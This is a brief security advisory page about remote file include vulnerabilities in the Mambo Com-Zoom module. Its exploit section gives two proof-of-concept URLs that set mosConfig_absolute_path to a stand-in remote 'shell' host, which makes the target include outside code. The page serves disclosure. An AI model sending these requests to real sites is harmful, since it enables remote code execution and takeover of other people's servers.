Mambo Com-Zoom Module MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities

info
discussion
exploit
solution
references

Mambo Com-Zoom Module MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://shell*
http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://shell*